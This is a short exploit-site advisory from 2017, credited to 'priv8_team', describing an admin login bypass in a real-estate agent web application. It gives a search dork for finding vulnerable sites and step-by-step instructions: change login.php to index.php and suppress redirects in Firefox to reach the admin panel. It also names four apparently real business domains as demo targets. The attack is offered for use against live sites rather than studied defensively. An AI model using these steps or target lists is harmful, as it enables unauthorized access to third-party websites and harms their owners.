agent admin login bypass

2017.10.04

Credit: priv8_team

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

+++++++++++++++++++++++++++++++++++++++++++++++++++++++
+ exploite title: agent admin login bypass
+
+ dork:inurl:request_appt.php?id=
+
+ tested on:win10 - firefox
+
+ exploit author: priv8_team
+++++++++++++++++++++++++++++++++++++++++++++++++++++++
+
+ proof of concept
+
+ find target
+
+ and enter target.com/admin/login.php
+
+ change admin/login.php to admin/index.php
+
+ if not access to site open noredirects on firefox and add target.com/admin/login
+
+ come back url and type target.com/admin/index.php
+
+ Access is done
+++++++++++++++++++++++++++++++++++++++++++++++++++++++
+ demo:
+
+ http://bsrrealtyinc.com/admin/login.php
+
+ www.stonetowerproperties.com/admin/login.php
+
+ cottage-realty.com/admin/login.php
+
+ thedahmteam.com/admin/login.php
+++++++++++++++++++++++++++++++++++++++++++++++++++++++
+
+ [RxR] priv8_team
+
+ special tnx: Mr_Yous3fi , Safengine , Red Nofoozi =) , and all members
+++++++++++++++++++++++++++++++++++++++++++++++++++++++

See this note in RAW Version

Vote for this issue:

100%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

agent admin login bypass

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.